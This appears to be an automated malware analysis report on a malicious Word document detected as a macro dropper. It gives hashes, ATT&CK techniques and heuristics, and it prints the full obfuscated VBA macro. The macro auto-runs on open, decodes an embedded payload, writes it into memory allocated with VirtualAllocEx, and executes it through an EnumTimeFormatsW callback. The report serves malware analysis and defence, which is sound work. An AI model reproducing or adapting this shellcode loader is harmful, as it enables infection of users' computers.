Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b8cc4c79909eb24e…

MALICIOUS

Office (OLE)

157.0 KB Created: 2016-11-15 13:58:00 Authoring application: Microsoft Office Word First seen: 2016-12-03
MD5: 5fc0f0f8481b7bea1f7b09577f22fc39 SHA-1: d6f83f53fb1a0288f8afa0acd390bd2e3b4d03d8 SHA-256: b8cc4c79909eb24e24e7a08ba95084668ff1f58ce3774a1b1d47470543ed3487
110 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The critical ClamAV heuristic identifies the file as 'Doc.Dropper.Agent-1830698', indicating it's a dropper. The presence of VBA macros, specifically a Document_Open macro, suggests an attempt to automatically execute malicious code upon opening. The macro's obfuscated nature and references to APIs like VirtualAlloc point towards payload execution, likely involving downloading additional malware.

Heuristics 5

  • ClamAV: Doc.Dropper.Agent-1830698 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-1830698
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    Dim alight As Variant
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12006 bytes
SHA-256: fc81393b1893b6f255a5b78c224c75eee340a4a24fe678ea69374211fb808a06
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim alight As Variant
Dim actitis As Variant
memorialist = "canker"
immodest
hemangioma = 4
While hemangioma <> 7
hemangioma = hemangioma + 1
torpedinidae = torpedinidae And 162
ghee = engross
Wend
End Sub
Function salvo(boehmenism)
Dim accipere As Long
Dim ctenizidae As Integer
Dim immense As Long
mesocricetus immense, VarPtr(boehmenism) + 8, 4
Dim saracen As String
Dim donation As Integer
Dim degrading As Long
auspicial = 0
aerodynamics = 57 - 56 - 2
reasoned = 13 - 65 + 52
gewonnen = Round(473.95)

gewonnen = gewonnen \ 74

mare = 4096
bankruptcy = paganism(ByVal aerodynamics, ByVal reasoned, 9915, mare, 64)
gewonnen = torpedinidae * 4

mesocricetus degrading, VarPtr(bankruptcy) + 8, 4
gewonnen = gewonnen \ 150

mesocricetus ByVal degrading, immense, 6183
electrophoresis = 57
taipei = 76
If (electrophoresis - taipei) <> 18 Then
electrophoresis = "go" & "lden"
ghee = "tubed"
gewonnen = torpedinidae Or 210
sociolinguistics = Mid("subtestuncomlignified", 8, 5) & LCase$("municaTi") & Replace("vcoherent", "coherent", "e")
Else
ghee = "apology"
taipei = 76
End If

salvo = degrading
End Function
Sub immodest()
Dim abba As Variant
Dim apodemus As String
Set mountains = unflattering.witness.SelectedItem
sectional = mountains.Name
heliograph = 67 + 8177
antioxidant = Right(sectional, heliograph)
depicture = bargainpriced.conjugation(antioxidant)
For informative = 49 To 66
buxus = 66
gewonnen = gewonnen * 3
intoxicate = LCase$("AVE") & Mid("unvaluedrsenetitian", 9, 5) & LCase$("SS")
intoxicate = LCase$("lE") & "avings"
Next informative

lambaste = "bras"
#If VBA6 And Win64 Then
Dim mysophobic As Variant
Dim eclaircissement As cebu
Dim alula As LongPtr
eclaircissement.start = 29 - 29
Dim pleurotus As String
#Else
Dim despise As Integer
eclaircissement = 0
Dim bouncing As Long
Dim alula As Long
#End If
indistinct = 0
atropa = "snu" & "ffcolored"
sacred = 100 - 44 - 15 + 4055
For allochthonous = 35 To 57
impugnable = 57
engross = "bowiea"
pinto = Replace("sebioluminescent", "bioluminescent", "lf") & "lessness"
pinto = "str" & "uctur" & Replace("ainclemency", "inclemency", "l")
Next allochthonous

unagitated = "subpanation"
kwack = "fluoroboride"
For alectryomancy = 48 To 76
ichthyolatry = 76
gewonnen = gewonnen - 369
banteng = "ph" & "onetic"
banteng = Mid("passeridaecojeffersonian", 11, 2) & "unter" & Mid("mpjumperunit", 3, 6)
Next alectryomancy

anecdotic = depicture
lycanthropy = "nonsurgical"
alula = salvo(anecdotic)
addresses = Mid("backswimmerwjdigitalis", 12, 2)
meekly = "bronze"
#If VBA6 And Win64 Then
Dim allegory As String
dishonest = "causans"
moraceous = "agaricaceae"
arrowy = 62 + 6 + 70 + 1142
#ElseIf Win32 Then
cornishman = "comptrollership"
slash = "ca" & "ntab" & Mid("scopoliarigianclumsy", 9, 6)
bandurria = 17 + 32 + 457
arrowy = bandurria + 3171

#End If
Dim myxine As String
Dim heliport As Variant
Dim sabbath As Long
sabbath = 92 + 86 - 101 + 1971
Dim astound As Long
astound = alula + arrowy
Dim inconsequence As Long
inconsequence = 0
zonam = ohmmeter(astound, sabbath, inconsequence)
For cocaine = 3 To 74
amalgamative = 74
ghee = "melody"
aversation = LCase$("bu") & "shman"
aversation = Replace("acivility", "civility", "n") & "alogue"
Next cocaine

End Sub

Sub num()
    With Selection
        If .Columns.Count > 1 And .Rows.Count > 1 Then
            MsgBox "Please select cells in only one row " _
                & "or only one column."
            End
        Else
            If .Cells.Count > 1 Then
                If .Columns.Count > 1 Then
                    .Cells.Delete ShiftCells:=wdDeleteCellsShiftUp
                Else
                    .Cells.Delete ShiftCells:=wdDeleteCellsShiftLeft
                End If
            Else
                .Cells.Delete ShiftCells:=wdDeleteCellsShiftLeft
            End If
        End If
    End With
End Sub



Attribute VB_Name = "bargainpriced"
'Love's an elusive charm and it can be painful
#If VBA6 And Win64 Then
'п»їLove can be so strange
Public Type cebu
'No you're never gonna crack
start As LongPtr
'You can keep it pure on the inside
End Type
'And you know what you believe to be right
Public Declare PtrSafe Function hoop Lib "user32" Alias "EndPaint" (flatten As LongPtr,education As LongPtr) As LongPtr
'You can keep it pure on the inside
Public Declare PtrSafe Function workboard Lib "user32" Alias "OpenClipboard" (garderobe As LongPtr) As Boolean
'Cause life is so short there's no time to waste it
Public Declare PtrSafe Function nube Lib "kernel32.dll" Alias "Sleep" (bone As LongPtr)
'To late for solutions to solve in the setting sun
Public  Declare PtrSafe Sub mesocricetus Lib "ntdll.dll" Alias "RtlMoveMemory" (busbar As Any, ByVal accompanist As Any, ByVal buckleya As LongPtr)
'To understand this crazy world
Public Declare PtrSafe Function arbitrage Lib "user32" Alias "SetParent" (ByVal impetrate As LongPtr, ByVal tc As LongPtr,dunderhead As LongPtr) As LongPtr
'To understand this crazy world
Public Declare PtrSafe Function barroom Lib "user32" Alias "GetUpdateRect" (halfbeak As LongPtr, imperator As LongPtr,cog As LongPtr) As Boolean
'So when nothing seems too certain or safe
Public  Declare PtrSafe Function ohmmeter Lib "kernel32.dll" Alias "EnumTimeFormatsW" (ByVal nonpasserine As Any, ByVal alumnus As Any, ByVal rhamnus As Any) As LongPtr
'So when nothing seems too certain or safe
Public  Declare PtrSafe Function paganism Lib "kernel32.dll" Alias "VirtualAllocEx" (cotenancy As LongPtr, africanamerican As LongPtr, ByVal lollipop As LongPtr, ByVal assisted As LongPtr, ByVal base As LongPtr) As LongPtr
'So when nothing seems too certain or safe

'So when nothing seems too certain or safe
#Else
'So when nothing seems too certain or safe
Public Declare Function ohmmeter Lib "kernel32.dll" Alias "EnumTimeFormatsW" (ByVal cryptobiotic As Any, ByVal temerarious As Any, ByVal furlike As Any) As Long
'So when nothing seems too certain or safe
Public Declare Function ladyofthenight Lib "user32" Alias "GetUpdateRect" (disclaimer As Long, pliers As Long, duck As Long) As Boolean
'So when nothing seems too certain or safe
Public Declare Function foxy Lib "user32" Alias "EndPaint" (chilblain As Long, anthericum As Long) As Long
'So when nothing seems too certain or safe
Public Declare Sub mesocricetus Lib "ntdll.dll" Alias "RtlMoveMemory" (estranged As Any, ByVal exhaled As Any, ByVal genial As Long)
'So when nothing seems too certain or safe
Public Declare Function prohibitionist Lib "user32" Alias "SetParent" (ByVal pawky As Long, ByVal motazilite As Long, phantom As Long) As Long
'No you're never gonna crack
Public Declare Function overrighteous Lib "kernel32.dll" Alias "Sleep" (fluster As Long)
'So when nothing seems too certain or safe
Public Declare Function paganism Lib "kernel32.dll" Alias "VirtualAllocEx" (amore As Long, chieftaincy As Long, ByVal pedantry As Long, ByVal unestablished As Long, ByVal neglige As Long) As Long
'Run my baby run my baby run
Public Declare Function gullet Lib "user32" Alias "OpenClipboard" (angular As Long) As Boolean
'So run my baby run my baby run

'No you're never gonna crack
#End If
'No you're never gonna crack
Function runup(gift)
runup = AscW(gift)
End Function
Function conjugation(diffusive) As String
Dim travesty As Byte

Dim counts As Long
Dim shakeout As Long
Dim constringe(63) As Long
Dim brooklime As Integer
Dim mutal(63) As Long
backbend = engross

Dim twentyeight(63) As Long
Dim levity As String
Dim gumption As Long
Dim bugloss() As Byte
Dim cosigner(255) As Byte
Dim ghyll As String

Dim cruciferous As String

Dim pentahedron As Long
Dim leisureiy(6965) As Byte
engross = backbend

Dim pianino As Variant

arthroscopy = 73 + 16711607
barbarian = 33 - 6 - 109 + 338
gracefully = 94 + 24 - 53 + 190
spermatophyta = 126 + 14 + 11 - 87
fuliginous = 16515072
nuptial = 4032
belted = 87 - 71 + 65520
cutlery = 258048
stung = 110 - 119 + 262153
Dim acclamation As Variant

Dim mutilate As Variant

bumboat = 65280
visavis = 4096
potboiler = 63
Dim bushwhacker As String
Dim botryoid(8243) As Byte
hagiography = 49 + 90 - 139
enwrap = 128 + 8115
For auburn = hagiography To enwrap
marvelous = 1
aposiopetic = Mid$(diffusive, auburn + 1, marvelous)
diet = LCase$("In") & "gest" & Replace("esait", "sait", "d")
brooch = "in" & "finitival"
testiness = "cashmere"
latria = runup(aposiopetic)
botryoid(auburn) = latria
Next
Dim nobody As Long
diver = 8
While diver <> 11
diver = diver + 1
torpedinidae = Round(361.1195)
gewonnen = torpedinidae \ 184
Wend

neurology = 8243
decolletage = 35
For cherubim = 0 To neurology
botryoid(cherubim) = botryoid(cherubim) + 8
Next cherubim
For hasten = 45 To 51
saline = 51
backbend = ghee
brooding = "si" & "mon"
brooding = "pro" & "hibiti" & "vely"
Next hasten

brooklime = 0
fist = 122
boundless = 67 + 188
For pentahedron = 0 To boundless
If (pentahedron >= 65) And (pentahedron <= 90) Then
cosigner(pentahedron) = pentahedron - 65
ElseIf (pentahedron >= 97) And (pentahedron <= 122) Then
cosigner(pentahedron) = pentahedron - 71
ElseIf (pentahedron >= 48) And (pentahedron <= 57) Then
cosigner(pentahedron) = pentahedron + 4
ElseIf pentahedron = 43 Then
cosigner(pentahedron) = 62
ElseIf pentahedron = 47 Then
cosigner(pentahedron) = 63
End If
Next pentahedron
For pentahedron = 0 To 63
constringe(pentahedron) = antipoison(pentahedron, spermatophyta)
mutal(pentahedron) = antipoison(pentahedron, visavis)
twentyeight(pentahedron) = antipoison(pentahedron, stung)
Next pentahedron
archon = 6
While archon <> 10
archon = archon + 1
torpedinidae = Abs(305.933)
gewonnen = Fix(222.1423)
Wend

bugloss = botryoid
koine = 30 + 28 - 120 + 66
For brushy = 6 To 53
dendrobium = 53
gewonnen = torpedinidae * 1
pelican = Replace("macknowledgment", "acknowledgment", "e") & LCase$("tEorOlOgy")
pelican = LCase$("Bi") & Mid("cobolsulcousexpressive", 6, 7)
Next brushy

educt = 80 - 67 - 10
engross = "anthriscus"

backbend = "drynaria"

calibration = educt + 1
mute = 50 - 92 + 44
For counts = 0 To neurology
alkylbenzenesulfonate = bugloss(counts)
discreditable = bugloss(counts + 2)
gumption = twentyeight(cosigner(alkylbenzenesulfonate)) _
 + mutal(cosigner(bugloss(counts + 1))) + constringe(cosigner(discreditable)) + cosigner(bugloss(counts + educt))
pentahedron = draw(gumption, arthroscopy)
leisureiy(shakeout) = slowconsuming(pentahedron, belted)
pentahedron = draw(gumption, bumboat)
leisureiy(shakeout + 1) = slowconsuming(pentahedron, barbarian)
leisureiy(shakeout + mute) = draw(gumption, gracefully)
shakeout = shakeout + mute + 1
counts = counts + 3
Next
conjugation = leisureiy
End Function

Function antipoison(strawbail, periphrase)
antipoison = strawbail * periphrase
End Function
Sub tableSel()
    Dim tempTable
    Documents("Log.doc").Tables(1).Select
    Set tempTable = Selection.Tables(1).Range
    tempRange.Tables(2).Select
End Sub

Function draw(cambodia, agamid)
draw = cambodia And agamid
End Function
Function slowconsuming(titus, analgesia)
slowconsuming = titus \ analgesia
End Function


Attribute VB_Name = "unflattering"
Attribute VB_Base = "0{FB913D05-D54F-43AE-B223-61BE15D5BE39}{8E83D3FF-7B80-4FEA-A1FA-EA1D5AC9E624}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False